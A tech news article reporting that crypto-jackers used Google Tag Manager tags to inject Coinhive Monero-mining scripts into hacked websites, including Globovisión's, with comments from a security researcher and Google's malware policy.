Crypto-jackers enlist Google Tag Manager to smuggle alt-coin miners

Ad giant has malware detection in its script-hosting service... but Coinhive isn't flagged

Crypto-jackers using Coin Hive code to secretly mine Monero via computing power supplied by the unsuspecting have found Google Tag Manager to be a convenient means of distribution.

Security researcher Troy Mursch told The Register that he recently found Coinhive's free-to-use JavaScript running on the Globovisión website – Globovisión being a 24-hour telly station for Venezuela and Latin America.

The code was invisibly spawned, he said, "from the embedded Google Tag Manager script gtm.js?id=GTM-KCDXG2D," which invoked cryptonight.wasm, a Web Assembly form of Coin Hive's JavaScript mining code.

Google Tag Manager allows marketers, or anyone else with a website, to create code – dubbed a tag – that can be placed in webpages to dynamically inject JavaScript snippets rather than using hardcoded JavaScript in those files.

Google's service, handily enough, provides more control and flexibility than static code delivery.

Because the code gets served by Google Tag Manager, it's not present in the source files on a web server. The JavaScript file and appended parameter gtm.js?id=GTM-KCDXG2D don't say anything about the function of the code invoked. Essentially, miscreants are hacking websites and quietly adding Google-hosted tags that contain the malicious code-mining code, thus obfuscating the source of the scripts.

Mursch said the Globovisión mining code was removed within an hour of discovery, and it's not clear how it got there. He found the Monero-crafting JS, he said, while reviewing another crypto-jacking incident with a Brazilian singer's website.

Google did not immediately respond to a request for comment.

A month ago, when The Register reported that Google short URLs were being co-opted for Monero, there were about 113,000 instances of cryptonight mining. Presently, there are about 180,000.

The Chocolate Factory's Tag Manager Terms of Service prohibits misuse, and the ad distribution biz has systems in place to look for malware in tags and prevent them from firing when found.

"In most cases, affected users are unaware that there are tags serving malware from their containers," the web giant explained on its website. "Usually through no fault of your own, a network provider becomes malware infected when they install 3rd party libraries or templates onto their websites, and subsequently transmit that malware to your site via the custom HTML tag that you published onto your website via Tag Manager."

That being the case, it appears that Google either cannot detect Coinhive code through Tag Manager or it doesn't consider it to be malicious. Most ad blockers, as well as antivirus tools, kill Coin Hive's code on sight these days.

Coinhive's development team did not respond to a request for comment.

Noting that crypto-jacking tops Malwarebytes' list of security ills likely to be visited upon businesses and consumers in 2018, Mursch said: "We should expect this trend to continue." ®




Biting the hand that feeds IT © 1998–2018